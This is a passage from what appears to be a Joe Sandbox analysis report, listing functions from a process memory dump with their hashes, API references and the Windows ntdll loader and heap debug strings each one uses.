                                                                                                                                                      • Opcode ID: a203ea23dde56675827ecd0ab54f6f4e50151de06bec282acdb102b504e167dc
                                                                                                                                                      • Instruction ID: 2d94a5c9a988b3e493ec3fa9cc57b77efa3ac50c77b673759c62eaa1c51d84ff
                                                                                                                                                      • Opcode Fuzzy Hash: a203ea23dde56675827ecd0ab54f6f4e50151de06bec282acdb102b504e167dc
                                                                                                                                                      • Instruction Fuzzy Hash: B591F039904685DFDB12CFA8C450AADBBF6FF89360F148A5EE845AB751C735A980CF10
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8DD6D0, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 151timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RtlDebugPrintTimes.NTDLL ref: 1E8DD879
                                                                                                                                                        • Part of subcall function 1E8B4779: RtlDebugPrintTimes.NTDLL ref: 1E8B4817
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: $$$$8,p$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-3738132362
                                                                                                                                                      • Opcode ID: c1130e7e8669445e8c4ba47fa0d1b826a21e89d755ff5f5583e68731259bbb83
                                                                                                                                                      • Instruction ID: 77e7f194914af7331846821446534c7fd975cd5619fb499ed6ba79e2d4029400
                                                                                                                                                      • Opcode Fuzzy Hash: c1130e7e8669445e8c4ba47fa0d1b826a21e89d755ff5f5583e68731259bbb83
                                                                                                                                                      • Instruction Fuzzy Hash: 5A51B075A0838A9FDB05DFA8C48479DBBB2BF84324F244799D4016B2C1D774A989CB80
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8A640D, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RtlDebugPrintTimes.NTDLL ref: 1E8A651C
                                                                                                                                                        • Part of subcall function 1E8A6565: RtlDebugPrintTimes.NTDLL ref: 1E8A6614
                                                                                                                                                        • Part of subcall function 1E8A6565: RtlDebugPrintTimes.NTDLL ref: 1E8A665F
                                                                                                                                                      Strings
                                                                                                                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 1E909790
                                                                                                                                                      • LdrpInitShimEngine, xrefs: 1E909783, 1E909796, 1E9097BF
                                                                                                                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 1E9097B9
                                                                                                                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 1E90977C
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1E9097A0, 1E9097C9
                                                                                                                                                      • apphelp.dll, xrefs: 1E8A6446
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-204845295
                                                                                                                                                      • Opcode ID: c059ece442175e862d09354e45c88da8f0d86b3d29cef5a436d35730b6bb96eb
                                                                                                                                                      • Instruction ID: b26201a72db98c48a8fd27ac8551fc92e610eebc3401239488854cdd96f07028
                                                                                                                                                      • Opcode Fuzzy Hash: c059ece442175e862d09354e45c88da8f0d86b3d29cef5a436d35730b6bb96eb
                                                                                                                                                      • Instruction Fuzzy Hash: 4F518C766083449FD311DF24D890BABB7E9BFC4644F440A1DFA95972A4EB30E904DB92
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E92FA02, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                                      • API String ID: 3446177414-4227709934
                                                                                                                                                      • Opcode ID: 418b33b8c2c6ec15cec2ae322837331767e369f2d8b8cc52f7a7139c3d7458c1
                                                                                                                                                      • Instruction ID: 547ad52d1f5df5de6dd0bd51f64202b0da35348653418bbf5b0a0499c7004d3f
                                                                                                                                                      • Opcode Fuzzy Hash: 418b33b8c2c6ec15cec2ae322837331767e369f2d8b8cc52f7a7139c3d7458c1
                                                                                                                                                      • Instruction Fuzzy Hash: 88415E7590121AABCF02CF95C894AEEBBBABF88354F54022DE905B7344D7719941DF90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E95F8F8, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                                                      • API String ID: 3446177414-3492000579
                                                                                                                                                      • Opcode ID: f91e6a1a3a1764e5881a8a5dc3c69109d257b6fd832e1517975bf961d946279f
                                                                                                                                                      • Instruction ID: aeaa8dcbf8dbce52ba6ce0f1a8adb7197c6c2d88cf2f96835c8eb15044b4c92e
                                                                                                                                                      • Opcode Fuzzy Hash: f91e6a1a3a1764e5881a8a5dc3c69109d257b6fd832e1517975bf961d946279f
                                                                                                                                                      • Instruction Fuzzy Hash: 7C71BE35904685EFCB02DFA8D8A0AADFBF6FF89220F04865EE4459B351D735A980CF50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8A6565, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1E909885
                                                                                                                                                      • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1E909843
                                                                                                                                                      • LdrpLoadShimEngine, xrefs: 1E90984A, 1E90988B
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1E909854, 1E909895
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-3589223738
                                                                                                                                                      • Opcode ID: caf96870fc8b907e7af400f2a6f0ea852e67359adf276239a552d818ba73a0c2
                                                                                                                                                      • Instruction ID: 682e3a91715ebe75fade4b67ead3a57acf4bb3dda9fadc46434c60c8b781e3a4
                                                                                                                                                      • Opcode Fuzzy Hash: caf96870fc8b907e7af400f2a6f0ea852e67359adf276239a552d818ba73a0c2
                                                                                                                                                      • Instruction Fuzzy Hash: B551C575A143989FDB04DBACCC94AED77B6BFC0704F440729E951AB299DB70AC40DB80
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8DDA20, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                                      • API String ID: 3446177414-3224558752
                                                                                                                                                      • Opcode ID: b10a4a09f937279abed18b2da23fff095e618d6ad8f6b53dae843c8896c4aad7
                                                                                                                                                      • Instruction ID: ebe54a65b87e4b381568a7d8354f6c8a3860a487e46677da6f5bb182b6f66092
                                                                                                                                                      • Opcode Fuzzy Hash: b10a4a09f937279abed18b2da23fff095e618d6ad8f6b53dae843c8896c4aad7
                                                                                                                                                      • Instruction Fuzzy Hash: 31413635954789DFC722DF28C494B99B3A9FF40320F048B6DE8168B3C1C738A984CB90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E95ECD7, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • ---------------------------------------, xrefs: 1E95EDF9
                                                                                                                                                      • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 1E95EDE3
                                                                                                                                                      • HEAP: , xrefs: 1E95ECDD
                                                                                                                                                      • Entry Heap Size , xrefs: 1E95EDED
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                                                                                      • API String ID: 3446177414-1102453626
                                                                                                                                                      • Opcode ID: 2c55faccb35043b79ec81085057293245eaa467a498317241b3f1f7b0adc4b37
                                                                                                                                                      • Instruction ID: c868dafd79be457cf34d8ee75ffd9967d4b38b90fae92619c0905e85f5acb4a6
                                                                                                                                                      • Opcode Fuzzy Hash: 2c55faccb35043b79ec81085057293245eaa467a498317241b3f1f7b0adc4b37
                                                                                                                                                      • Instruction Fuzzy Hash: 6841A035A10265DFC715CF19C484969BBEAFF86354725C66EE5059B311D732EC42CF80
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8DDAC0, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                                      • API String ID: 3446177414-1222099010
                                                                                                                                                      • Opcode ID: 86936b012511a38ad7d06f19cadea97447cc5cd2f91babb9721754840e30578c
                                                                                                                                                      • Instruction ID: f19bd5dd62c6fc0db5f8b261023cc16b33072bd5ccbde0271516257a4cb5ed45
                                                                                                                                                      • Opcode Fuzzy Hash: 86936b012511a38ad7d06f19cadea97447cc5cd2f91babb9721754840e30578c
                                                                                                                                                      • Instruction Fuzzy Hash: 6D3100355147CCDFD722CF28C858FA97BA9FF01768F044B99E8028B791C779A988CA11
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8B9046, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: $$@
                                                                                                                                                      • API String ID: 3446177414-1194432280
                                                                                                                                                      • Opcode ID: e26063e3f05b1aa997a426d17ce9f8b320ae7ca24839c3c8c8f7ad7ed74c497e
                                                                                                                                                      • Instruction ID: c98bde17c0fa261a47899e7984c6b9e6e5bb54824f4baee5c868f2f75c61a0cd
                                                                                                                                                      • Opcode Fuzzy Hash: e26063e3f05b1aa997a426d17ce9f8b320ae7ca24839c3c8c8f7ad7ed74c497e
                                                                                                                                                      • Instruction Fuzzy Hash: 2F812BB5D002A9DBDB21DB54CC44BDEB6B9AF48710F0446EAE909B7290D7309E85DFA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8E4C3D, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1E923439
                                                                                                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 1E92344A, 1E923476
                                                                                                                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 1E923466
                                                                                                                                                      • LdrpFindDllActivationContext, xrefs: 1E923440, 1E92346C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                                      • API String ID: 3446177414-3779518884
                                                                                                                                                      • Opcode ID: 9db3e8ac34cd91deae3a5aa1e180387fdb2a13e1e14ae253c850780dde7b558a
                                                                                                                                                      • Instruction ID: e00536071bbb5710b84bcc47732331ff08f497dee7669940f19939fee1637492
                                                                                                                                                      • Opcode Fuzzy Hash: 9db3e8ac34cd91deae3a5aa1e180387fdb2a13e1e14ae253c850780dde7b558a
                                                                                                                                                      • Instruction Fuzzy Hash: 3D314E72E00297AFDB12DB1C889AA59B2A5FF83354F42832AD90D57EC4D7709D80C7D1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8D237A, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 1E91A79F
                                                                                                                                                      • LdrpDynamicShimModule, xrefs: 1E91A7A5
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1E91A7AF
                                                                                                                                                      • apphelp.dll, xrefs: 1E8D2382
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 0-176724104
                                                                                                                                                      • Opcode ID: d4708db23695592a5202b63dac98325e3e7f7c69ddcbd7ebfb0415e3da182b1e
                                                                                                                                                      • Instruction ID: 1f1e4e0474150e321b77c28bd2b8f411c3b34d0dc6717ae0890b619ad47358da
                                                                                                                                                      • Opcode Fuzzy Hash: d4708db23695592a5202b63dac98325e3e7f7c69ddcbd7ebfb0415e3da182b1e
                                                                                                                                                      • Instruction Fuzzy Hash: C1311276A04259EBD7159F29CCC0A9E77FAFFC0B20F14026DE911AB254E7B4AD41CB90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8AF8B0, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                      • API String ID: 3446177414-3610490719
                                                                                                                                                      • Opcode ID: 8e7dc8a89f7fe1fd8b01ed148f73f4ad947f9e72e5fd6f67020f0503b25cf44c
                                                                                                                                                      • Instruction ID: 307c4f4e8f421d2bf7b35f46c5c7d3b133776947de916ac59e53f4f42b6af5c4
                                                                                                                                                      • Opcode Fuzzy Hash: 8e7dc8a89f7fe1fd8b01ed148f73f4ad947f9e72e5fd6f67020f0503b25cf44c
                                                                                                                                                      • Instruction Fuzzy Hash: 1891E975604695AFC726CB29C850B6EB7AABFC4644F040B5DFA419B3C1DB34F881CB91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8D0AEB, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • Failed to allocated memory for shimmed module list, xrefs: 1E919F1C
                                                                                                                                                      • LdrpCheckModule, xrefs: 1E919F24
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1E919F2E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-161242083
                                                                                                                                                      • Opcode ID: 3c732b401bb2a524721acff42251abf68d39b7af26a8861e391dfbef9151fd81
                                                                                                                                                      • Instruction ID: 85b598013651d358d2448a25c393deb2f12dab150e90cba5ac757a0000a11a65
                                                                                                                                                      • Opcode Fuzzy Hash: 3c732b401bb2a524721acff42251abf68d39b7af26a8861e391dfbef9151fd81
                                                                                                                                                      • Instruction Fuzzy Hash: F171BE74A042499FDB05DF68C890AAEB7F6FF84708F18466DE802EB355E730AD46CB50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8D9723, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                                      • API String ID: 3446177414-2283098728
                                                                                                                                                      • Opcode ID: 327ee4a9f29d3afaa92717f7b94d5f985897b93956a00249fa3975773f5e744c
                                                                                                                                                      • Instruction ID: 26231f69fd9affdda2d8a923c04133c5bf282a4dcbabc8451240df92e4f22833
                                                                                                                                                      • Opcode Fuzzy Hash: 327ee4a9f29d3afaa92717f7b94d5f985897b93956a00249fa3975773f5e744c
                                                                                                                                                      • Instruction Fuzzy Hash: 635103346047469BC714DF38C884A6977A3BFC4724F180B2DE556AB6D5EBB0E819CB81
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8EC640, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 1E9280E9
                                                                                                                                                      • Failed to reallocate the system dirs string !, xrefs: 1E9280E2
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1E9280F3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-1783798831
                                                                                                                                                      • Opcode ID: 2de34aacfefc48e9f657c1b94328eda0ece676b0a917078bd556cb190353ea88
                                                                                                                                                      • Instruction ID: 3deba6ef43fa002e508b819e1729657c9f121ec7db323456b1033ad7a258b6ef
                                                                                                                                                      • Opcode Fuzzy Hash: 2de34aacfefc48e9f657c1b94328eda0ece676b0a917078bd556cb190353ea88
                                                                                                                                                      • Instruction Fuzzy Hash: 4E41C3B5918395ABC711DF68DC80B9B77E9AFC5650F014B2EF948972A5EB30E800CB91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E9343D5, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 1E934508
                                                                                                                                                      • LdrpCheckRedirection, xrefs: 1E93450F
                                                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 1E934519
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                      • API String ID: 3446177414-3154609507
                                                                                                                                                      • Opcode ID: 80c46eede089bfe77bbfc0ffe475d33ea95d92ee51f74c400111ede1f5d1d829
                                                                                                                                                      • Instruction ID: f9baf58a8a3cb25319cb36b62dde0c12f4ec6237ce1c593a6330d4a4a365dbf9
                                                                                                                                                      • Opcode Fuzzy Hash: 80c46eede089bfe77bbfc0ffe475d33ea95d92ee51f74c400111ede1f5d1d829
                                                                                                                                                      • Instruction Fuzzy Hash: 5B41B03A6142219BCB12CF79D848A5677EBAF88752B270B7DEC9897355D730EC008F91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

